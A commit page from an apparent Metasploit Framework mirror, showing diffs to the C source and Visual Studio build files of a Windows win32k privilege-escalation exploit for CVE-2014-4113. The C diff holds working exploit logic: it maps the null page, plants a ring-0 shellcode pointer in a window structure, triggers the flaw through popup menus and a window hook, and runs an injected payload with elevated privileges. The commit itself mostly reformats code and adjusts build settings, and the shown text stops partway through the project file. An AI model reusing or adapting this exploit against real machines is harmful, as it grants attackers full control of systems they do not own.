github
/
metasploit-framework
mirror of https://github.com/rapid7/metasploit-framework
1
Fork 0
Code Releases Activity

Fix project settings, make files, start tidying of code

This commit is contained in:
OJ 2014-10-28 07:58:19 +10:00
parent 1508be6254
commit 062eff8ede
5 changed files with 295 additions and 169 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

22
external/source/exploits/cve-2014-4113/cve-2014-4113.sln vendored
View File

@ -1,9 +1,9 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Express 2013 for Windows Desktop
VisualStudioVersion = 12.0.30723.0
# Visual Studio 2013
VisualStudioVersion = 12.0.21005.1
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "cve-2014-4113", "cve-2014-4113\cve-2014-4113.vcxproj", "{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}"
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "cve-2014-4113", "cve-2014-4113\cve-2014-4113.vcxproj", "{E80F11CD-6698-492F-B4B0-1A2348A24BB0}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
@ -13,14 +13,14 @@ Global
Release|x64 = Release|x64
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Debug|Win32.ActiveCfg = Debug|Win32
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Debug|Win32.Build.0 = Debug|Win32
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Debug|x64.ActiveCfg = Debug|x64
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Debug|x64.Build.0 = Debug|x64
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Release|Win32.ActiveCfg = Release|Win32
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Release|Win32.Build.0 = Release|Win32
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Release|x64.ActiveCfg = Release|x64
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Release|x64.Build.0 = Release|x64
{E80F11CD-6698-492F-B4B0-1A2348A24BB0}.Debug|Win32.ActiveCfg = Debug|Win32
{E80F11CD-6698-492F-B4B0-1A2348A24BB0}.Debug|Win32.Build.0 = Debug|Win32
{E80F11CD-6698-492F-B4B0-1A2348A24BB0}.Debug|x64.ActiveCfg = Debug|x64
{E80F11CD-6698-492F-B4B0-1A2348A24BB0}.Debug|x64.Build.0 = Debug|x64
{E80F11CD-6698-492F-B4B0-1A2348A24BB0}.Release|Win32.ActiveCfg = Release|Win32
{E80F11CD-6698-492F-B4B0-1A2348A24BB0}.Release|Win32.Build.0 = Release|Win32
{E80F11CD-6698-492F-B4B0-1A2348A24BB0}.Release|x64.ActiveCfg = Release|x64
{E80F11CD-6698-492F-B4B0-1A2348A24BB0}.Release|x64.Build.0 = Release|x64
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE

197
external/source/exploits/cve-2014-4113/cve-2014-4113/cve-2014-4113.c vendored
View File

@ -2,6 +2,9 @@
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
// Uncomment this line to enable to debug output
#define DEBUGGING
// Purloined from ntstatus.h
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L) // ntsubauth
@ -9,18 +12,22 @@
#include <windows.h>
#undef WIN32_NO_STATUS
#ifdef DEBUGGING
#include <stdio.h>
#endif
#ifndef _NTDEF_
typedef __success(return >= 0) LONG NTSTATUS;
typedef NTSTATUS *PNTSTATUS;
#endif
#define DEBUGGING FALSE
#ifdef _M_X64
typedef unsigned __int64 QWORD;
typedef QWORD *PQWORD;
#endif
#define PTR_SIZE sizeof(UINT_PTR)
int WndProcClue = 0;
int HookCallbackClue = 0;
WNDPROC lpPrevWndFunc;
@ -34,21 +41,22 @@ typedef NTSTATUS(NTAPI *lNtAllocateVirtualMemory)(
IN PSIZE_T RegionSize,
IN ULONG AllocationType,
IN ULONG Protect
);
);
typedef NTSTATUS(NTAPI *lPsLookupProcessByProcessId)(
IN HANDLE ProcessId,
OUT PVOID Process
);
);
typedef NTSTATUS(NTAPI *lZwQuerySystemInformation)(
_In_ DWORD SystemInformationClass,
_Inout_ PVOID SystemInformation,
_In_ ULONG SystemInformationLength,
_Out_opt_ PULONG ReturnLength
);
);
typedef struct _SYSTEM_MODULE {
typedef struct _SYSTEM_MODULE
{
HANDLE Reserved1;
PVOID Reserved2;
PVOID ImageBaseAddress;
@ -61,8 +69,8 @@ typedef struct _SYSTEM_MODULE {
BYTE Name[256];
} SYSTEM_MODULE, *PSYSTEM_MODULE;
typedef struct _SYSTEM_MODULE_INFORMATION {
typedef struct _SYSTEM_MODULE_INFORMATION
{
ULONG ModulesCount;
SYSTEM_MODULE Modules[0];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
@ -70,6 +78,20 @@ typedef struct _SYSTEM_MODULE_INFORMATION {
lPsLookupProcessByProcessId pPsLookupProcessByProcessId = NULL;
lNtAllocateVirtualMemory pNtAllocateVirtualMemory = NULL;
#ifdef DEBUGGING
void LogMessage(char* pszFormat, ...)
{
static char s_acBuf[2048];
va_list args;
va_start(args, pszFormat);
vsprintf_s(s_acBuf, sizeof(s_acBuf) - 1, pszFormat, args);
printf("%s\n", s_acBuf);
OutputDebugString(s_acBuf);
va_end(args);
}
#else
#define LogMessage(...)
#endif
long CALLBACK HookCallbackTwo(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam)
{
@ -77,27 +99,23 @@ long CALLBACK HookCallbackTwo(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam)
return -5;
}
LRESULT CALLBACK HookCallback(int code, WPARAM wParam, LPARAM lParam) {
#ifdef _M_X64
if (*(DWORD *)(lParam + 16) == 0x1EB && !HookCallbackClue)
#else
if (*(DWORD *)(lParam + 8) == 0x1EB && !HookCallbackClue)
#endif
LRESULT CALLBACK HookCallback(int code, WPARAM wParam, LPARAM lParam)
{
if (*(DWORD *)(lParam + PTR_SIZE * 2) == 0x1EB && !HookCallbackClue)
{
HookCallbackClue = 1;
if (UnhookWindowsHook(WH_CALLWNDPROC, HookCallback)) {
#ifdef _M_X64
lpPrevWndFunc = (WNDPROC)SetWindowLongPtr(*(HWND *)(lParam + 24), GWLP_WNDPROC, (ULONG_PTR)HookCallbackTwo);
#else
lpPrevWndFunc = (WNDPROC)SetWindowLongA(*(HWND *)(lParam + 12), GWLP_WNDPROC, (LONG)HookCallbackTwo);
#endif
if (UnhookWindowsHook(WH_CALLWNDPROC, HookCallback))
{
lpPrevWndFunc = (WNDPROC)SetWindowLongPtrA(*(HWND *)(lParam + PTR_SIZE * 3), GWLP_WNDPROC, (ULONG_PTR)HookCallbackTwo);
}
}
return CallNextHookEx(0, code, wParam, lParam);
}
LRESULT CALLBACK WndProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) {
if (msg == 289 && WndProcClue != 1) {
LRESULT CALLBACK WndProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam)
{
if (msg == 289 && WndProcClue != 1)
{
WndProcClue = 1;
PostMessageA(hwnd, 256, 40, 0);
PostMessageA(hwnd, 256, 39, 0);
@ -114,15 +132,17 @@ QWORD MyPtiCurrent(void) {
return Win32ThreadInfo;
}
#else
DWORD __stdcall MyPtiCurrent() {
DWORD __stdcall MyPtiCurrent()
{
__asm {
mov eax, fs : 18h
mov eax, [eax + 40h]
mov eax, [eax + 40h]
}
}
#endif
int _stdcall shellcode_ring0(int one, int two, int three, int four) {
int _stdcall shellcode_ring0(int one, int two, int three, int four)
{
void *my_process_info = NULL;
void *system_info = NULL;
@ -134,27 +154,15 @@ int _stdcall shellcode_ring0(int one, int two, int three, int four) {
return 0;
}
void
LogMessage(char* pszFormat, ...) {
if (DEBUGGING != TRUE) {
return;
}
static char s_acBuf[2048];
va_list args;
va_start(args, pszFormat);
vsprintf(s_acBuf, pszFormat, args);
printf("%s\n", s_acBuf);
OutputDebugString(s_acBuf);
va_end(args);
}
DWORD WINAPI ExecutePayload(LPVOID lpPayload) {
DWORD WINAPI ExecutePayload(LPVOID lpPayload)
{
VOID(*lpCode)() = (VOID(*)())lpPayload;
lpCode();
return ERROR_SUCCESS;
}
void Win32kNullPage(LPVOID lpPayload) {
void Win32kNullPage(LPVOID lpPayload)
{
HWND hWnd;
WNDCLASSA WndClass;
LPBYTE promise_land = NULL;
@ -178,18 +186,25 @@ void Win32kNullPage(LPVOID lpPayload) {
}
#ifdef _M_X64
if (VersionInformation.dwMajorVersion == 6 && VersionInformation.dwMinorVersion && VersionInformation.dwMinorVersion == 1) { // Ex: Windows 7 SP1
if (VersionInformation.dwMajorVersion == 6 && VersionInformation.dwMinorVersion && VersionInformation.dwMinorVersion == 1)
{
// Ex: Windows 7 SP1
LogMessage("[*] Windows 6.1 found...");
OffsetWindows = 0x208;
}
#else
if (VersionInformation.dwMajorVersion == 6) {
if (VersionInformation.dwMinorVersion && VersionInformation.dwMinorVersion == 1) { // Ex: Windows 7 SP1
if (VersionInformation.dwMajorVersion == 6)
{
if (VersionInformation.dwMinorVersion && VersionInformation.dwMinorVersion == 1)
{
// Ex: Windows 7 SP1
LogMessage("[*] Windows 6.1 found...");
OffsetWindows = 0xf8;
}
else if (!VersionInformation.dwMinorVersion) {
LogMessage("[*] Windows 6.0 found..."); // Ex: Windows 2008 R2
else if (!VersionInformation.dwMinorVersion)
{
// Ex: Windows 2008 R2
LogMessage("[*] Windows 6.0 found...");
OffsetWindows = 0xe0;
}
else {
@ -221,13 +236,15 @@ void Win32kNullPage(LPVOID lpPayload) {
LogMessage("[*] Solving symbols...");
hNtdll = LoadLibraryA("ntdll");
if (hNtdll == NULL) {
if (hNtdll == NULL)
{
LogMessage("[!] Failed to Load ntdll...");
return;
}
pZwQuerySystemInformation = (lZwQuerySystemInformation)GetProcAddress(hNtdll, "ZwQuerySystemInformation");
if (pZwQuerySystemInformation == NULL) {
if (pZwQuerySystemInformation == NULL)
{
LogMessage("[!] Failed to solve ZwQuerySystemInformation");
return;
}
@ -242,23 +259,25 @@ void Win32kNullPage(LPVOID lpPayload) {
status = pZwQuerySystemInformation(11, &SystemInfoBufferSize, 0, &SystemInfoBufferSize);
if (SystemInfoBufferSize == 0) {
if (SystemInfoBufferSize == 0)
{
LogMessage("[!] Requesting pZwQuerySystemInformation required length failed");
return;
}
else {
LogMessage("[*] pZwQuerySystemInformation required length %d", SystemInfoBufferSize);
}
LogMessage("[*] pZwQuerySystemInformation required length %d", SystemInfoBufferSize);
pSystemInfoBuffer = (PULONG)LocalAlloc(LMEM_ZEROINIT, SystemInfoBufferSize);
if (pSystemInfoBuffer == NULL) {
if (pSystemInfoBuffer == NULL)
{
LogMessage("[!] Allocation for SystemInfo failed");
return;
}
status = pZwQuerySystemInformation(11, pSystemInfoBuffer, SystemInfoBufferSize, &SystemInfoBufferSize);
if (status != STATUS_SUCCESS) {
if (status != STATUS_SUCCESS)
{
LogMessage("[!] Requesting kernel modules through ZwQuerySystemInformation failed");
return;
}
@ -272,13 +291,16 @@ void Win32kNullPage(LPVOID lpPayload) {
memset(nt_name, 0, 256);
int i = 0;
while (i < smi->ModulesCount) {
ULONG i = 0;
while (i < smi->ModulesCount)
{
SYSTEM_MODULE *sm = (SYSTEM_MODULE *)(smi->Modules + i);
LogMessage("[*] Checking module %s", sm->Name);
if (strstr((char *)sm->Name, ".exe")) {
if (strstr((char *)sm->Name, ".exe"))
{
char *start = strstr((char *)sm->Name, "nt");
if (start != NULL) {
if (start != NULL)
{
nt_base = sm->ImageBaseAddress;
strncpy_s(nt_name, 256, start, _TRUNCATE);
break;
@ -287,13 +309,12 @@ void Win32kNullPage(LPVOID lpPayload) {
i++;
}
if (nt_name == NULL) {
if (nt_name == NULL)
{
LogMessage("[!] nt not found");
return;
}
else {
LogMessage("[*] Good! nt found as %s at 0x%08x", nt_name, nt_base);
}
LogMessage("[*] Good! nt found as %s at 0x%08x", nt_name, nt_base);
ntkrnl = LoadLibraryA(nt_name);
@ -301,7 +322,8 @@ void Win32kNullPage(LPVOID lpPayload) {
pPsLookupProcessByProcessId = (lPsLookupProcessByProcessId)GetProcAddress(ntkrnl, "PsLookupProcessByProcessId");
if (pPsLookupProcessByProcessId == NULL) {
if (pPsLookupProcessByProcessId == NULL)
{
LogMessage("[!] Failed to solve PsLookupProcessByProcessId\n");
return;
}
@ -323,7 +345,8 @@ void Win32kNullPage(LPVOID lpPayload) {
WndClass.lpfnWndProc = WndProc; // Called with CallWindowProc => http://msdn.microsoft.com/en-us/library/windows/desktop/ms633571(v=vs.85).aspx
WndClass.lpszClassName = "woqunimalegebi";
if (RegisterClassA(&WndClass) == 0) {
if (!RegisterClassA(&WndClass))
{
LogMessage("[!] RegisterClassA failed ");
return;
}
@ -332,7 +355,8 @@ void Win32kNullPage(LPVOID lpPayload) {
LogMessage("[*] Creating window...");
hWnd = CreateWindowExA(0, "woqunimalegebi", NULL, 0, -1, -1, 0, 0, NULL, NULL, NULL, NULL);
if (hWnd == NULL) {
if (hWnd == NULL)
{
LogMessage("[!] CreateWindowExA failed");
return;
}
@ -351,7 +375,9 @@ void Win32kNullPage(LPVOID lpPayload) {
current_process = GetCurrentProcess();
if (pNtAllocateVirtualMemory(current_process, (LPVOID*)(&base_address), 0, &region_size, (MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN), PAGE_EXECUTE_READWRITE) != STATUS_SUCCESS) {
ULONG ulAllocationType = MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN;
if (pNtAllocateVirtualMemory(current_process, (LPVOID*)&base_address, 0, &region_size, ulAllocationType, PAGE_EXECUTE_READWRITE) != STATUS_SUCCESS)
{
LogMessage("[!] Failed to allocate null page");
return;
}
@ -364,17 +390,20 @@ void Win32kNullPage(LPVOID lpPayload) {
DWORD pti = MyPtiCurrent();
#endif
if (pti == 0) {
if (pti == 0)
{
LoadLibrary("user32.dll");
LoadLibrary("gdi32.dll");
pti = MyPtiCurrent();
}
if (pti == 0) {
if (pti == 0)
{
LogMessage("[!] Filed to get PtiCurrent");
return;
}
else {
else
{
#ifdef _M_X64
LogMessage("[*] Good! pti 0x%016llx", pti);
#else
@ -395,7 +424,7 @@ void Win32kNullPage(LPVOID lpPayload) {
/* win32k!tagWND->lpfnWndProc = &shellcode_ring0 */
(QWORD)test = 0x10000008B;
*((PQWORD)test) = &shellcode_ring0;
*((PQWORD)test) = (QWORD)&shellcode_ring0;
#else
void *test = promise_land + 3;
/* We need to save this check, otherwise unmapped memory will be dereferenced (blue screen)
@ -415,7 +444,8 @@ void Win32kNullPage(LPVOID lpPayload) {
LogMessage("[*] Triggering vulnerability...");
HMENU MenuOne = CreatePopupMenu();
if (MenuOne == NULL) {
if (MenuOne == NULL)
{
LogMessage("[!] First CreatePopupMenu failed");
return;
}
@ -425,14 +455,16 @@ void Win32kNullPage(LPVOID lpPayload) {
MenuOneInfo.cbSize = sizeof(MENUITEMINFOA);
MenuOneInfo.fMask = MIIM_STRING;
if (InsertMenuItemA(MenuOne, 0, TRUE, &MenuOneInfo) != TRUE) {
if (InsertMenuItemA(MenuOne, 0, TRUE, &MenuOneInfo) != TRUE)
{
LogMessage("[!] First InsertMenuItemA failed");
DestroyMenu(MenuOne);
return;
}
HMENU MenuTwo = CreatePopupMenu();
if (MenuTwo == NULL) {
if (MenuTwo == NULL)
{
LogMessage("[!] Second CreatePopupMenu failed");
DestroyMenu(MenuOne);
return;
@ -445,14 +477,17 @@ void Win32kNullPage(LPVOID lpPayload) {
MenuTwoInfo.dwTypeData = "";
MenuTwoInfo.cch = 1;
MenuTwoInfo.hSubMenu = MenuOne;
if (InsertMenuItemA(MenuTwo, 0, TRUE, &MenuTwoInfo) != TRUE) {
if (InsertMenuItemA(MenuTwo, 0, TRUE, &MenuTwoInfo) != TRUE)
{
LogMessage("[!] Second InsertMenuItemA failed");
DestroyMenu(MenuTwo);
DestroyMenu(MenuOne);
return;
}
if (SetWindowsHookExA(WH_CALLWNDPROC, HookCallback, NULL, GetCurrentThreadId()) == NULL) {
if (SetWindowsHookExA(WH_CALLWNDPROC, HookCallback, NULL, GetCurrentThreadId()) == NULL)
{
LogMessage("[!] SetWindowsHookExA failed :-(\n");
DestroyMenu(MenuTwo);
DestroyMenu(MenuOne);
@ -465,15 +500,17 @@ void Win32kNullPage(LPVOID lpPayload) {
// If everything worked process should be privileges at this point
LogMessage("[!] Executing payload...");
CreateThread(0, 0, ExecutePayload, lpPayload, 0, NULL);
return;
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved) {
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
{
BOOL bReturnValue = TRUE;
switch (dwReason) {
switch (dwReason)
{
case DLL_QUERY_HMODULE:
hAppInstance = hinstDLL;
if (lpReserved != NULL) {
if (lpReserved != NULL)
{
*(HMODULE *)lpReserved = hAppInstance;
}
break;
@ -487,4 +524,4 @@ BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved) {
break;
}
return bReturnValue;
};
}

236
external/source/exploits/cve-2014-4113/cve-2014-4113/cve-2014-4113.vcxproj vendored
View File

@ -1,5 +1,5 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
@ -19,132 +19,220 @@
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}</ProjectGuid>
<RootNamespace>cve20144113</RootNamespace>
<ProjectGuid>{E80F11CD-6698-492F-B4B0-1A2348A24BB0}</ProjectGuid>
<RootNamespace>cve-2014-4113</RootNamespace>
<Keyword>Win32Proj</Keyword>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<WholeProgramOptimization>false</WholeProgramOptimization>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v120</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<WholeProgramOptimization>false</WholeProgramOptimization>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v120</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<WholeProgramOptimization>false</WholeProgramOptimization>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v120</PlatformToolset>
<WholeProgramOptimization>false</WholeProgramOptimization>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<WholeProgramOptimization>false</WholeProgramOptimization>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v120</PlatformToolset>
<WholeProgramOptimization>false</WholeProgramOptimization>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
<ImportGroup Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<IncludePath>../../../ReflectiveDLLInjection/common;$(IncludePath)</IncludePath>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<IncludePath>../../../ReflectiveDLLInjection/common;$(IncludePath)</IncludePath>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<IncludePath>../../../ReflectiveDLLInjection/common;$(IncludePath)</IncludePath>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<IncludePath>../../../ReflectiveDLLInjection/common;$(IncludePath)</IncludePath>
<PropertyGroup>
<_ProjectFileVersion>10.0.30319.1</_ProjectFileVersion>
<OutDir>$(Configuration)\$(Platform)\</OutDir>
<IntDir>$(Configuration)\$(Platform)\</IntDir>
<LinkIncremental>false</LinkIncremental>
<GenerateManifest>false</GenerateManifest>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRules />
<CodeAnalysisRuleAssemblies />
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<CompileAs>CompileAsC</CompileAs>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE_2014_4113_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
</ClCompile>
<Link>
<AdditionalDependencies>Mpr.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
<DelayLoadDLLs>%(DelayLoadDLLs)</DelayLoadDLLs>
<GenerateDebugInformation>true</GenerateDebugInformation>
<OptimizeReferences>true</OptimizeReferences>
<OutputFile>$(OutDir)$(TargetName).$(ProcessorArchitecture)$(TargetExt)</OutputFile>
<SubSystem>Windows</SubSystem>
<TargetMachine>MachineX86</TargetMachine>
<ModuleDefinitionFile>
</ModuleDefinitionFile>
<AdditionalOptions>/ignore:4070</AdditionalOptions>
</Link>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
exit 0</Command>
</PostBuildEvent>
<ResourceCompile>
<PreprocessorDefinitions>_DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ResourceCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<CompileAs>CompileAsC</CompileAs>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE_2014_4113_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
</ClCompile>
<Link>
<AdditionalDependencies>Mpr.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
<DelayLoadDLLs>%(DelayLoadDLLs)</DelayLoadDLLs>
<GenerateDebugInformation>true</GenerateDebugInformation>
<OptimizeReferences>true</OptimizeReferences>
<OutputFile>$(OutDir)$(TargetName).$(ProcessorArchitecture)$(TargetExt)</OutputFile>
<SubSystem>Windows</SubSystem>
<ModuleDefinitionFile>
</ModuleDefinitionFile>
<AdditionalOptions>/ignore:4070</AdditionalOptions>
</Link>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
exit 0</Command>
</PostBuildEvent>
<ResourceCompile>
<PreprocessorDefinitions>_DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ResourceCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<CompileAs>CompileAsC</CompileAs>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<CompileAs>Default</CompileAs>
<Optimization>MinSpace</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>false</IntrinsicFunctions>
<AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE_2014_4113_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FunctionLevelLinking>false</FunctionLevelLinking>
<PrecompiledHeader>
</PrecompiledHeader>
<AssemblerListingLocation>$(OutDir)\</AssemblerListingLocation>
<ObjectFileName>$(OutDir)\</ObjectFileName>
<ProgramDataBaseFileName>$(OutDir)\</ProgramDataBaseFileName>
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<BufferSecurityCheck>false</BufferSecurityCheck>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
</ClCompile>
<Link>
<AdditionalDependencies>Mpr.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
<IgnoreAllDefaultLibraries>false</IgnoreAllDefaultLibraries>
<IgnoreSpecificDefaultLibraries>%(IgnoreSpecificDefaultLibraries)</IgnoreSpecificDefaultLibraries>
<DelayLoadDLLs>%(DelayLoadDLLs)</DelayLoadDLLs>
<GenerateDebugInformation>false</GenerateDebugInformation>
<OptimizeReferences>true</OptimizeReferences>
<OutputFile>$(OutDir)$(TargetName).$(ProcessorArchitecture)$(TargetExt)</OutputFile>
<GenerateMapFile>true</GenerateMapFile>
<MapFileName>$(OutDir)\cve-2014-4113.map</MapFileName>
<SubSystem>Windows</SubSystem>
<OptimizeReferences>
</OptimizeReferences>
<EnableCOMDATFolding>
</EnableCOMDATFolding>
<RandomizedBaseAddress>false</RandomizedBaseAddress>
<DataExecutionPrevention>
</DataExecutionPrevention>
<ImportLibrary>$(OutDir)\cve-2014-4113.lib</ImportLibrary>
<TargetMachine>MachineX86</TargetMachine>
<Profile>false</Profile>
<ModuleDefinitionFile>
